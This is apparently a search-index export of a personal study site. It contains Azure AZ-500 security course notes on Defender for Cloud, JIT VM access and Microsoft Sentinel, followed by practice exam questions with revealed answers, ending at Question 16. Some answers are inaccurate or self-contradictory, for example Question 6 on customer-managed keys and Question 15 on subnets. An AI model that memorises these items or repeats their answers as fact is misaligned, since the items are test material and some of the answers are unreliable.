                            Control Domains Description Network security (NS) Network Security\u00a0covers controls to secure and protect networks, including securing virtual networks, establishing private connections, preventing and mitigating external attacks, and securing Domain Name System (DNS). Identity Management (IM) Identity Management\u00a0covers controls to establish a secure identity and access controls using identity and access management systems, including the use of single sign-on, strong authentications, managed identities (and service principals) for applications, conditional access, and account anomalies monitoring. Privileged Access (PA) Privileged Access\u00a0covers controls to protect privileged access to your tenant and resources, including a range of controls to protect your administrative model, administrative accounts, and privileged access workstations against deliberate and inadvertent risk. Data Protection (DP) Data Protection\u00a0covers control of data protection at rest, in transit, and via authorized access mechanisms, including discover, classify, protect, and monitoring sensitive data assets using access control, encryption, key management, and certificate management. Asset Management (AM) Asset Management\u00a0covers controls to ensure security visibility and governance over your resources, including recommendations on permissions for security personnel, security access to asset inventory and managing approvals for services and resources (inventory,\u00a0track, and\u00a0correct). Logging and Threat Detection (LT) Logging and Threat Detection\u00a0covers controls for detecting threats on the cloud and enabling, collecting, and storing audit logs for cloud services, including enabling detection, investigation, and remediation processes with controls to generate high-quality alerts with native threat detection in cloud services; it also includes collecting logs with a cloud monitoring service, centralizing security analysis with a\u00a0security event management (SEM), time synchronization, and log retention. Incident Response (IR) Incident Response\u00a0covers controls in the incident response life cycle - preparation, detection and analysis, containment, and post-incident activities, including using Azure services (such as Microsoft Defender for Cloud and Sentinel) and/or other cloud services to automate the incident response process. Posture and Vulnerability Management (PV) Posture and Vulnerability Management\u00a0focuses on controls for assessing and improving the cloud security posture, including vulnerability scanning, penetration testing, and remediation, as well as security configuration tracking, reporting, and correction in cloud resources. Endpoint Security (ES) Endpoint Security\u00a0covers controls in endpoint detection and response, including the use of endpoint detection and response (EDR) and anti-malware service for endpoints in cloud environments. Backup and Recovery (BR) Backup and Recovery\u00a0covers controls to ensure that data and configuration backups at the different service tiers are performed, validated, and protected. DevOps Security (DS) DevOps Security\u00a0covers the controls related to the security engineering and operations in the DevOps processes, including deployment of critical security checks (such as static application security testing and vulnerability management) prior to the deployment phase to ensure the security throughout the DevOps process; it also includes common topics such as threat modeling and software supply security. Governance and Strategy (GS) Governance and Strategy\u00a0provides guidance for ensuring a coherent security strategy and documented governance approach to guide and sustain security assurance, including establishing roles and responsibilities for the different cloud security functions, unified technical strategy, and supporting policies and standards.","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#28-security-policies-and-defender-for-cloud-initiatives","title":"2.8. Security policies and Defender for Cloud initiatives","text":"

                            Like security policies, Defender for Cloud initiatives are also created in Azure Policy. You can use\u00a0Azure Policy\u00a0to manage your policies, build initiatives, and assign initiatives to multiple subscriptions or entire management groups.

                            The default initiative automatically assigned to every subscription in Microsoft Defender for Cloud is the Microsoft cloud security benchmark.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#29-view-and-edit-security-policies","title":"2.9. View and edit security policies","text":"

                            There are two specific roles for Defender for Cloud:

                            1. Security Administrator: Has the same view rights as security reader. Can also update the security policy and dismiss alerts.
                            2. Security reader: Has rights to view Defender for Cloud items such as recommendations, alerts, policy, and health. Can't make changes.

                            You can edit security policies through the\u00a0Azure Policy portal\u00a0via\u00a0Representational State Transfer Application Programming Interface (REST API)\u00a0or using\u00a0Windows PowerShell.

                            The Security Policy screen reflects the action taken by the policies assigned to the subscription or management group you selected.

                            • Use the links at the top to open a policy assignment that applies to the subscription or management group. These links let you access the assignment and edit or disable the policy.\u00a0For example, if you see that a particular policy assignment is effectively denying endpoint protection, use the link to edit or disable the policy.
                            • In the list of policies, you can see the effective application of the policy on your subscription or management group. The settings of each policy that apply to the scope are taken into consideration, and the cumulative outcome of actions taken by the policy is shown.\u00a0For example, if one assignment of the policy is disabled, but in another, it's set to\u00a0AuditIfNotExist, then the cumulative effect applies\u00a0AuditIfNotExist. The more active effect always takes precedence.
                            • The policies' effect can be:\u00a0Append,\u00a0Audit,\u00a0AuditIfNotExists,\u00a0Deny,\u00a0DeployIfNotExists, or\u00a0Disabled.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#210-microsoft-defender-for-cloud-recommendations","title":"2.10. Microsoft Defender for Cloud recommendations","text":"

                            In practice, it works like this:

                            1. Microsoft Cloud security benchmark is an\u00a0initiative\u00a0that contains requirements.

                              For example, Azure Storage accounts must restrict network access to reduce their attack surface.

                            2. The initiative includes multiple\u00a0policies, each requiring a specific resource type. These policies enforce the requirements in the initiative.

                              To continue the example, the storage requirement is enforced with the policy \"Storage accounts should restrict network access using virtual network rules.\"

                            3. Microsoft Defender for Cloud continually assesses your connected subscriptions. If it finds a resource that doesn't satisfy a policy, it displays a\u00a0recommendation\u00a0to fix that situation and harden the security of resources that aren't meeting your security requirements.

                              For example, if an Azure Storage account on your protected subscriptions isn't protected with virtual network rules, you see the recommendation to harden those resources.

                            So, (1)\u00a0an initiative includes\u00a0(2)\u00a0policies that generate\u00a0(3)\u00a0environment-specific recommendations.

                            Defender for Cloud continually assesses your cross-cloud resources for security issues. It then\u00a0aggregates all the findings into a single score\u00a0so that you can tell, at a glance, your current security situation: the\u00a0higher the score, the\u00a0lower the identified risk level.

                            In the Azure mobile app, the secure score is shown as a percentage value, and you can tap the secure score to see the details that explain the score:

                            To increase your security, review Defender for Cloud's\u00a0recommendations page\u00a0and remediate the recommendation by implementing the remediation instructions for each issue.\u00a0Recommendations are grouped into security controls. Each control is a\u00a0logical group of related security recommendations\u00a0and\u00a0reflects your vulnerable attack surfaces. Your score only improves when you\u00a0remediate all\u00a0of the recommendations for a\u00a0single resource within a control.

                            • Insights - Gives you extra details for each recommendation, such as:

                              • Preview recommendation\u00a0- This recommendation won't affect your secure score until\u00a0general availability (GA).
                              • Fix\u00a0- From within the recommendation details page, you can use 'Fix' to resolve this issue.
                              • Enforce\u00a0- From within the recommendation details page, you can automatically deploy a policy to fix this issue whenever someone creates a non-compliant resource.
                              • Deny\u00a0- From within the recommendation details page, you can prevent new resources from being created with this issue.

                            Which recommendations are included in the secure score calculations?

                            • Only built-in recommendations have an impact on the secure score.
                            • Recommendations flagged as Preview aren't included in the calculations of your secure score. They should still be remediated wherever possible so that when the preview period ends, they'll contribute towards your score.
                            • Preview recommendations are marked with:\u00a0
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#211-brute-force-attacks","title":"2.11. Brute force attacks","text":"

                            To counteract brute-force attacks, you can take multiple measures such as:

                            • Disable the public IP address and use one of these connection methods:

                              • Use a point-to-site virtual private network (VPN)
                              • Create a site-to-site VPN
                              • Use Azure ExpressRoute to create secure links from your on-premises network to Azure.
                              • Require two-factor authentication
                            • Increase password length and complexity

                            • Limit login attempts

                            • Implement Captcha

                              • About CAPTCHAs\u00a0- Any time you let people register on your site or even enter a name and URL (like for a blog comment), you might get a flood of fake names. These are often left by automated programs (bots) that try to leave URLs on every website they can find. (A common motivation is to post the URLs of products for sale.) You can help make sure that a user is a real person and not a computer program by using a\u00a0CAPTCHA\u00a0to validate users when they register or otherwise enter their name and site.
                              • CAPTCHA stands for\u00a0Completely Automated Public Turing test to tell Computers and Humans Apart. A CAPTCHA is a\u00a0challenge-response\u00a0test in which the user is asked to do something that is easy for a person to do but hard for an automated program to do. The most common type of CAPTCHA is one where you see distorted letters and are asked to type them. (The distortion is supposed to make it hard for bots to decipher the letters.)
                              • Limit the amount of time that the ports are open.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#just-in-time-vm-access","title":"Just-in-time VM access","text":"

                            Threat actors actively hunt accessible machines with open management ports, like\u00a0remote desktop protocol (RDP)\u00a0or\u00a0secure shell protocol (SSH). All of your virtual machines are potential targets for an attack. When a VM is successfully compromised, it's used as the entry point to attack further resources within your environment.

                            The diagram shows the logic Defender for Cloud applies when deciding how to categorize your supported VM. When Defender for Cloud finds a machine that can benefit from JIT, it adds that machine to the recommendation's Unhealthy resources tab.

                            Just-in-time (JIT) virtual machine (VM) access is used to lock down inbound traffic to your Azure VMs, reducing exposure to attacks while providing easy access to connect to VMs when needed. When you enable JIT VM Access for your VMs, you next create a policy that determines the ports to help protect, how long ports should remain open, and the approved IP addresses that can access these ports. The policy helps you stay in control of what users can do when they request access. Requests are logged in the Azure activity log, so you can easily monitor and audit access. The policy will also help you quickly identify the existing VMs that have JIT VM Access enabled and the VMs where JIT VM Access is recommended.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#3-configure-and-monitor-microsoft-sentinel","title":"3. Configure and monitor Microsoft Sentinel","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#31-what-is-microsoft-sentinel","title":"3.1. What is Microsoft Sentinel","text":"

                            Microsoft Sentinel is a scalable, cloud-native, security information event management (SIEM) and security orchestration automated response (SOAR) solution. Microsoft Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for alert detection, threat visibility, proactive hunting, and threat response.

                            Think of Microsoft Sentinel as the first\u00a0SIEM-as-a-service\u00a0that brings the power of the cloud and artificial intelligence to help security operations teams efficiently identify and stop cyber-attacks before they cause harm.

                            Microsoft Sentinel integrates with Microsoft 365 solution and correlates millions of signals from different products such as: - Azure Identity Protection, - Microsoft Cloud App Security, - and soon Azure Advanced Threat Protection, Windows Advanced Threat Protection, M365 Advanced Threat Protection, Intune, and Azure Information Protection.

                            It enables the following services:

                            It enables the following services:

                            • Collect data at cloud scale\u00a0across all users, devices, applications, and infrastructure, both on-premises and in multiple clouds.
                            • Detect previously undetected threats, and minimize false positives using Microsoft's analytics and unparalleled threat intelligence.
                            • Investigate threats with artificial intelligence, and hunt for suspicious activities at scale, tapping into years of cyber security work at Microsoft.
                            • Respond to incidents rapidly\u00a0with built-in orchestration and automation of common tasks.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#configure-data-connections-to-sentinel","title":"Configure data connections to Sentinel","text":"

                            To onboard Microsoft Sentinel, these are the global prerequisites:

                            • Active Azure Subscription
                            • Log Analytics workspace.
                            • To enable Microsoft Sentinel, you need contributor permissions to the subscription in which the Microsoft Sentinel workspace resides.
                            • To use Microsoft Sentinel, you need either contributor or reader permissions on the resource group that the workspace belongs to.
                            • Additional permissions may be needed to connect specific data sources.
                            • Microsoft Sentinel is a paid service.

                            Having those, to onboard Microsoft Sentinel, you first need to connect to your security sources.

                            Microsoft Sentinel comes with a number of connectors for Microsoft solutions, and additionally there are built-in connectors to the broader security ecosystem for non-Microsoft solutions. You can also use common event format, Syslog or REST-API to connect your data sources with Microsoft Sentinel as well.

                            The following data connection methods are supported by Microsoft Sentinel:

                            • Service to service integration: Some services are connected natively, such as AWS and Microsoft services, these services leverage the Azure foundation for out-of-the-box integration, the following solutions can be connected in a few clicks:
                            • Amazon Web Services - CloudTrail
                            • Azure Activity
                            • Microsoft Entra audit logs and sign-ins
                            • Microsoft Entra ID Protection
                            • Azure Advanced Threat Protection
                            • Azure Information Protection
                            • Microsoft Defender for Cloud
                            • Cloud App Security
                            • Domain name server
                            • Microsoft 365
                            • Microsoft Defender ATP
                            • Microsoft web application firewall
                            • Windows firewall
                            • Windows security events

                            External solutions

                            • API: Some data sources are connected using APIs that are provided by the connected data source. Typically, most security technologies provide a set of APIs through which event logs can be retrieved. The APIs connect to Microsoft Sentinel and gather specific data types and send them to Azure Log Analytics
                            • Agent: The Microsoft Sentinel agent, which is based on the Log Analytics agent, converts CEF formatted logs into a format that can be ingested by Log Analytics. Depending on the appliance type, the agent is installed either directly on the appliance, or on a dedicated Linux server. To connect your external appliance to Microsoft Sentinel, the agent must be deployed on a dedicated machine (VM or on-premises) to support the communication between the appliance and Microsoft Sentinel. You can deploy the agent automatically or manually. Automatic deployment is only available if your dedicated machine is a new VM you are creating in Azure. Alternatively, you can deploy the agent manually on an existing Azure VM, on a VM in another cloud, or on an on-premises machine.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#32-create-workbooks-to-monitor-sentinel-data","title":"3.2. Create workbooks to monitor Sentinel data","text":"

                            After onboarding to Microsoft Sentinel, monitor your data using the Azure Monitor workbooks integration.

                            After you connect your data sources to Microsoft Sentinel, you can monitor the data using the Microsoft Sentinel integration with Azure Monitor Workbooks, which provides versatility in creating custom workbooks. While Workbooks are displayed differently in Microsoft Sentinel, it may be helpful for you to determine how to create interactive reports with Azure Monitor Workbooks. Microsoft Sentinel allows you to create custom workbooks across your data and comes with built-in workbook templates to quickly gain insights across your data as soon as you connect a data source.

                            Workbooks are intended for\u00a0Security operations center (SOC)\u00a0engineers and analysts of all tiers to visualize data. Workbooks are best used for high-level views of Microsoft Sentinel data and don't require coding knowledge.

                            You can't integrate workbooks with external data.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#33-enable-rules-to-create-incidents","title":"3.3. Enable rules to create incidents","text":"

                            To help you reduce noise and minimize the number of alerts you have to review and investigate, Microsoft Sentinel uses analytics to correlate alerts into incidents.

                            Incidents are groups of related alerts that indicate an actionable possible threat you can investigate and resolve.

                            You can use the built-in correlation rules as-is or as a starting point to build your own.

                            Microsoft Sentinel also provides machine learning rules to map your network behavior and then look for anomalies across your resources.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#34-configure-playbooks","title":"3.4. Configure playbooks","text":"

                            Automate your common tasks and simplify security orchestration with playbooks that integrate with Azure services and your existing tools.

                            To build playbooks with Azure Logic Apps, you can choose from a growing gallery of built-in playbooks. These include 200 or more connectors for services such as Azure functions. The connectors allow you to apply any custom logic in code like:

                            • ServiceNow
                            • Jira
                            • Zendesk
                            • HTTP requests
                            • Microsoft Teams
                            • Slack
                            • Microsoft Entra ID
                            • Microsoft Defender for Endpoint
                            • Microsoft Defender for Cloud Apps

                            For example, if you use the ServiceNow ticketing system, use Azure Logic Apps to automate your workflows and open a ticket in ServiceNow each time a particular alert or incident is generated.

                            Playbooks are intended for\u00a0Security operations center (SOC)\u00a0engineers and analysts of all tiers to\u00a0automate\u00a0and\u00a0simplify tasks,\u00a0including data ingestion,\u00a0enrichment,\u00a0investigation, and\u00a0remediation. Playbooks work best with single, repeatable tasks and don't require coding knowledge. Playbooks aren't suitable for ad-hoc or complex task chains or for documenting and sharing evidence.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#35-hunt-and-investigate-potential-breaches","title":"3.5. Hunt and investigate potential breaches","text":"

                            Microsoft Sentinel deep investigation tools help you to understand the scope and find the root cause of a potential security threat.

                            Interactive graph. - You can choose an entity on the interactive graph to ask interesting questions for a specific entity and drill down into that entity and its connections to get to the root cause of the threat.

                            Built-in queries. - Use Microsoft Sentinel's powerful hunting search-and-query tools, based on the MITRE framework, which enable you to proactively hunt for security threats across your organization\u2019s data sources before an alert is triggered. While hunting, create bookmarks to return to interesting events later. Use a bookmark to share an event with others or group events with other correlating events to create a compelling incident for investigation.

                            Microsoft Sentinel supports Jupyter notebooks in Azure Machine Learning workspaces, including full machine learning, visualization, and data analysis libraries:

                            • Perform analytics that isn't built into Microsoft Sentinel, such as some Python machine learning features.
                            • Create data visualizations that aren't built into Microsoft Sentinel, such as custom timelines and process trees.
                            • Integrate data sources outside of Microsoft Sentinel, such as an on-premises data set.

                            Notebooks are intended for threat hunters or Tier 2-3 analysts, incident investigators, data scientists, and security researchers. They require a higher learning curve and coding knowledge. They have limited automation support.

                            Notebooks in Microsoft Sentinel provide:

                            • Queries to both Microsoft Sentinel and external data
                            • Features for data enrichment, investigation, visualization, hunting, machine learning, and big data analytics

                            Notebooks are best for:

                            • More complex chains of repeatable tasks
                            • Ad-hoc procedural controls
                            • Machine learning and custom analysis

                            Notebooks support rich Python libraries for manipulating and visualizing data. They're useful for documenting and sharing analysis evidence.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-exams/","title":"My 100 selected questions to warm up for the AZ-500 certificate","text":"

                            These questions form the hard core of my question bank. They originate from various sources, including Udemy, Microsoft's free practice assessments, and YouTube videos. Successfully completing these questions does not guarantee approval for the AZ-500 exam, but it does provide a good indicator of where you stand up.

                            Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-1","title":"Question 1","text":"

                            You have custom alert rules in Microsoft Sentinel. The rules exceed the query length limitations. You need to resolve the issue. Which function should you use for the rule? Select only one answer.

                            • ADX functions
                            • Azure functions with a timer trigger
                            • stored procedures
                            • user-defined functions
                            See response

                            You can use user-defined functions to overcome the query length limitation. Timer trigger runs in a scheduled manner (pull, not push). Using ADX functions to create Azure Data Explorer queries inside the Log Analytics query window is unsupported. Stored procedures are unsupported by Azure Data Explorer.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-2","title":"Question 2","text":"

                            You have an Azure Kubernetes Service (AKS) cluster named AKS1. You are configuring network isolation for AKS1. You need to limit which IP addresses can access the Kubernetes control plane. What should you do? Select only one answer.

                            • Configure API server authorized IP ranges.
                            • Configure Azure Front Door.
                            • Customize CoreDNS for AKS.
                            • Implement Open Service Mesh AKS add-on.
                            See response

                            The \"Open Service Mesh AKS add-on\" is designed to enhance communication and control between services within an Azure Kubernetes Service (AKS) cluster, offering features like service discovery, load balancing, and observability. However, it is not directly related to the task of limiting IP addresses that can access the Kubernetes control plane. Configuring API server authorized IP ranges is the correct approach for controlling access to the control plane by specifying which IP addresses or IP ranges are allowed to interact with the Kubernetes API server. The Open Service Mesh AKS add-on addresses a different aspect of AKS management, focusing on service-to-service communication, making it less relevant for the specific task of network isolation and control of the Kubernetes control plane. Azure Front Door is a global service for routing and load balancing traffic. It is not designed for controlling access to the Kubernetes control plane. Front Door is used for directing and optimizing the delivery of web applications, and it doesn't offer the fine-grained control needed to limit access to the Kubernetes API server. CoreDNS is a DNS server used within Kubernetes clusters for service discovery. While CoreDNS can play a role in the internal DNS resolution within the cluster, it is not a tool for restricting access to the Kubernetes control plane. Customizing CoreDNS is generally related to DNS resolution configurations and would not address the task of limiting IP addresses that can access the control plane.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-3","title":"Question 3","text":"

                            Your company has an Azure subscription and an Amazon Web Services (AWS) account. You plan to deploy Kubernetes to AWS. You need to ensure that you can use Azure Monitor Container insights to monitor container workload performance. What should you deploy first? Select only one answer.

                            • AKS Engine
                            • Azure Arc-enabled Kubernetes
                            • Azure Container Instances
                            • Azure Kubernetes Service (AKS)
                            • Azure Stack HCI
                            See response

                            Azure Arc-enabled Kubernetes is the only configuration that includes Kubernetes and can be deployed to AWS.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-4","title":"Question 4","text":"

                            You have an Azure subscription that contains a virtual machine named VM1. VM1 is configured with just-in-time (JIT) VM access. You need to request access to VM1. Which PowerShell cmdlet should you run? Select only one answer.

                            • Add-AzNetworkSecurityRuleConfig
                            • Get-AzJitNetworkAccessPolicy
                            • Set-AzJitNetworkAccessPolicy
                            • Start-AzJitNetworkAccessPolicy
                            See response

                            The\u00a0start-AzJitNetworkAccesspolicy\u00a0PowerShell cmdlet is used to request access to a JIT-enabled virtual machine.\u00a0Set-AzJitNetworkAccessPolicy\u00a0is used to enable JIT on a virtual machine.\u00a0Get-AzJitNetworkAccessPolicy\u00a0and\u00a0Add-AzNetworkSecurityRuleConfig\u00a0are not used to start a request access. Start-AzJitNetworkAccessPolicy is used to initiate the JIT access request. When you run this cmdlet, you're essentially requesting access to a VM for a specific period, during which your access will be allowed through specific network security group (NSG) rules. These rules are temporarily modified to grant access only during the JIT access window you've requested. After the specified time window expires, the NSG rules revert to their previous state, thereby revoking the temporary access.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-5","title":"Question 5","text":"

                            You have an Azure subscription. You plan to use the\u00a0az aks create\u00a0command to deploy an Azure Kubernetes Service (AKS) cluster named AKS1 that has Azure AD integration. You need to ensure that local accounts cannot be used on AKS1. Which flag should you use with the command? Select only one answer.

                            • disable-local-accounts
                            • generate-ssh-keys
                            • kubelet-config
                            • windows-admin-username
                            See response

                            When deploying an AKS cluster, local accounts are enabled by default. Even when enabling RBAC or Azure AD integration, --admin access still exists essentially as a non-auditable backdoor option. To disable local accounts on an AKS cluster, you should use the\u00a0--disable-local-accounts\u00a0flag with the\u00a0az aks create\u00a0command. The remaining options do not remove local accounts.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-6","title":"Question 6","text":"

                            You need to enable encryption at rest by using customer-managed keys (CMKs). Which two services support CMKs? Each correct answer presents a complete solution. Select all answers that apply.

                            • Azure Blob storage
                            • Azure Disk Storage
                            • Azure Files
                            • Azure NetApp Files
                            • Log Analytics workspace
                            See response

                            Azure Files and Azure Blob Storage

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-7","title":"Question 7","text":"

                            You implement dynamic data masking for an Azure Synapse Analytics workspace. You need to provide only a user named User1 with the ability to see the data. What should you do? Select only one answer.

                            • Create a Conditional Access policy for Azure SQL Database, and then grant access.
                            • Grant the UNMASK permission to User1.
                            • Use the\u00a0ALTER TABLE\u00a0statement to drop the masking function.
                            • Use the\u00a0ALTER TABLE\u00a0statement to edit the masking function.
                            See response

                            Granting the UNMASK permission to User1 removes the mask from User1 only. Creating a Conditional Access policy for Azure SQL Database, and then granting access is not enough for User1 to see the data, only to sign in. Using the\u00a0ALTER TABLE\u00a0statement to edit the masking function affects all users. Using the\u00a0ALTER TABLE\u00a0statement to drop the masking function removes the mask altogether.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-8","title":"Question 8","text":"

                            You need to provide public anonymous access to a file in an Azure Storage account. The solution must follow the principle of least privilege. Which two actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

                            • For the container, set Public access level to\u00a0Blob.
                            • For the container, set Public access level to\u00a0Container.
                            • For the storage account, set Blob public access to\u00a0Disabled.
                            • For the storage account, set Blob public access to\u00a0Enabled.
                            See response

                            Unless prevented by another setting, setting Public access level to\u00a0Blob\u00a0allows public access to the blob only. Setting Blob public access to\u00a0Enabled\u00a0is a prerequisite for setting the access level of container or blob. Setting Blob public access to\u00a0Disabled\u00a0prevents any public access and setting Public access level to\u00a0Container\u00a0also allows any current and future blobs in the container, which does not follow the principle of least privilege.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-9","title":"Question 9","text":"

                            You have an application that will securely share files hosted in Azure Blob storage to external users. The external users will not use Azure AD to authenticate. You plan to share more than 1,000 files. You need to restrict access to only a single IP address for each file. What should you do? Select only one answer.

                            • Configure a storage account firewall.
                            • Generate a service SAS that include the signedIP field.
                            • Set the Allow public anonymous access to setting for the storage account.
                            • Set the Secure transfer required setting for the storage account.
                            See response

                            Using the Generate a service SAS that include the signedIP field allows a SAS to be generated by using an account key, and each SAS can be configured with an allowed IP address. Configuring the storage account firewall does not allow for more than 200 IP address rules. Setting the Allow public anonymous access to setting for the storage account does not prevent access by an IP address. Setting the Secure transfer required property for the storage account prevents HTTP access, but it does not limit where the access request originates from.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-10","title":"Question 10","text":"

                            You have an Azure virtual machine named VM1 the runs Windows Server 2022. A programmer is writing code to run on VM1. The code will use the system-assigned managed identity assigned to VM1 to access Azure resources. Which endpoint should the programmer use to request the authentication token required to access the Azure resources?

                            • Azure AD v1.0.
                            • Azure AD v2.0.
                            • Azure Resources Manager.
                            • Azure Instance Metadata Service.
                            See response

                            Azure Instance Metadata Service is a REST endpoint accessible to all IaaS virtual machines created via Azure Resource Manager (ARM). The endpoint is available at a well-known non-routable IP address (169.254.169.254) that can be accessed only from the virtual machines. The endpoint is used to request the authentication token required to gain access to the Azure resources. Azure AD v1.0 and Azure AD v2.0 endpoints are used to authenticate work and school accounts, not managed identities. The ARM endpoint is where the authentication token is sent by the code once it is obtained from the Azure Instance Metadata Service.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-11","title":"Question 11","text":"

                            **You are managing permission scopes for an Azure AD app registration. What are three OpenID Connect scopes that you can use? Each correct answer presents a complete solution. **

                            • email
                            • openID
                            • phone
                            • offline_access
                            See response

                            The openID scope appears on the work account consent page as the Sign you in permission. The email scope gives the app access to a user's primary email address in the form of the email claim. The offline_access scope gives your app access to resources on behalf of a user for an extended time. On the consent page, this scope appears as the Maintain access to data you have given it access to permission.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-12","title":"Question 12","text":"

                            You have a resource group named RG1 that contains an Azure virtual machine named VM1. A user named User1 is assigned the Contributor role for RG1. You need to prevent User1 from modifying the properties of VM1. What should you do?

                            • Add a deny assignment for\u00a0Microsoft.Compute/virtualMachines/*\u00a0in the VM1 scope. -
                            • Apply a read-only lock to the RG1 scope.
                            See response

                            A read-only lock on a resource group that contains a virtual machine prevents all users from starting or restarting the virtual machine. The RBAC assignment is set at the resource group level and inherited by the resource. The assignment needs to be edited at the original scope (level). You cannot directly create your own deny assignments. Assigning User1 the Virtual Machine User Login role in the RG1 scope will still allow User1 to have access as a contributor to restart VM1. While you can create custom roles with specific permissions and assign those roles to users, Azure RBAC does not provide a direct mechanism for creating \"deny\" assignments, which would explicitly prevent users from performing specific actions. In other words, you can't explicitly deny a user or group certain permissions at the resource level using RBAC. To achieve fine-grained control over resource access, Azure generally focuses on granting permissions via role assignments and ensuring that users have only the necessary privileges for their tasks. If you want to restrict access, you typically grant a less permissive role or apply resource locks (such as a read-only lock, which prevents modifications) rather than creating deny assignments, which are not a standard part of Azure RBAC.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-13","title":"Question 13","text":"

                            **You have an Azure subscription that contains an Azure AD tenant and an Azure web app named App1. A user named User1 needs permission to manage App1. The solution must follow the principle of least privilege. Which role should you assign to User1? **

                            • Cloud Application Administrator \u2013 Since App1 is an app in Azure, this role provides administrative permissions to App1 and follows the principle of least privilege.
                            • Application Administrator \u2013 This role provides administrative permissions to App1 but also provides additional permissions to the app proxy for on-premises applications.
                            • Cloud App Security Administrator \u2013 This role is specific to the Microsoft Defender for Cloud Apps solution.
                            • Application Developer \u2013 This role allows the user to create registrations but not manage applications.
                            See response

                            Correct: Cloud Application Administrator \u2013 Since App1 is an app in Azure, this role provides administrative permissions to App1 and follows the principle of least privilege. Incorrect: Application Administrator \u2013 This role provides administrative permissions to App1 but also provides additional permissions to the app proxy for on-premises applications. Incorrect: Cloud App Security Administrator \u2013 This role is specific to the Microsoft Defender for Cloud Apps solution. Incorrect: Application Developer \u2013 This role allows the user to create registrations but not manage applications.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-14","title":"Question 14","text":"

                            You have an Azure subscription that contains a virtual machine named VM1 and a storage account named storage1. You need to ensure that VM1 can access storage1 over the Azure backbone network. What should you implement?

                            • Service endpoints
                            • Private endpoints
                            • A subnet
                            • A VPN gateway
                            See response

                            Service endpoints route the traffic inside of Azure backbone, allowing access to the entire service, for example, all Microsoft SQL servers or the storage accounts of all customers. Private endpoints provide access to a specific instance. A subnet does not allow isolation or route traffic to the Azure backbone. A VPN gateway does not allow traffic isolation to all resources.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-15","title":"Question 15","text":"

                            You have an Azure subscription that contains a virtual network named VNet1. VNet1 contains the following subnets:

                            • Subnet1: Has a connected virtual machine
                            • Subnet2: Has a\u00a0Microsoft.Storage\u00a0service endpoint
                            • Subnet3: Has subnet delegation to the\u00a0Microsoft.Web/serverFarms\u00a0service
                            • Subnet: Has no additional configurations

                            You need to deploy an Azure SQL managed instance named managed1 to VNet1. To which subnets can you connect managed1?

                            • Subnet 2 and Subset 4
                            • Subnet2, Subnet3, and Subnet4 only
                            • Subnet 1, Subnet2, Subnet3, and Subnet4
                            See response

                            Azure SQL managed instances require a dedicated subnet without other resources or virtual machines connected to it. This is because managed instances have specific networking and isolation requirements, and sharing a subnet with other resources, like the virtual machine in Subnet1, could lead to conflicts in network configurations. Therefore, to deploy \"managed1,\" you should select a subnet that doesn't have any other resources connected to it, such as Subnet2, Subnet3, or a new dedicated subnet within VNet1.You can deploy an SQL managed instance to a dedicated virtual network subnet that does not have any resource connected. The subnet can have a service endpoint or can be delegated for a different service. For this scenario, you can deploy managed1 to Subnet2, Subnet3, and Subnet4 only. You cannot deploy managed1 to Subnet1 because Subnet1 has a connected virtual machine.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-16","title":"Question 16","text":"

